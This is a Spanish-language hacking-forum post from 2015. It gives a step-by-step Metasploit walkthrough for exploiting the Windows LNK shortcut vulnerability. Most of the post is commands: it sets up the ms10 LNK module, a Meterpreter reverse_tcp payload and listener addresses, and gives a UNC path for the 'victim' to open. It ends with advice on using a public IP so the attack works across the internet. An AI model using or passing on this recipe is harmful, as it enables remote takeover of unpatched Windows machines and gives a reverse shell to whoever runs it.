Metasploit [Explotar Vulnerailidad LNK]

Iniciado por Payasako, Febrero 17, 2015, 06:07:57 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Febrero 17, 2015, 06:07:57 PM Ultima modificación: Febrero 18, 2015, 10:54:10 AM por ANTRAX
Hola a todos de Underc0de, hoy os voy a explicar y poner los pasos para explotar la vulnerabilidad LNK de Windows con Metasploit.

Primero hay que actualizar Metasploit.
Código: text
#msfupdate


Luego configuramos Metasploit como sigue:
Código: text
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.0.33 SRVHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set URIPATH / URIPATH => / msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.0.33 LHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 4444 LPORT => 4444 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit


Luego en el navegador de la PC víctima visitamos la siguiente URL:
Código: text
\192.168.0.33QueHeTwEW


Entonces se abrirá el explorador de windows para visualizar los archivos compartidos que contienen el archivo .LNK que produce la ejecución del payload.

Para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:
Código: text
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254 UNCHOST => 192.168.0.254


Esto puede ser necesario para explotar la vulnerabilidad en WAN. En este parámetro iría nuestra IP publica.

Bueno espero que os haya ayudado. ¡Saludos!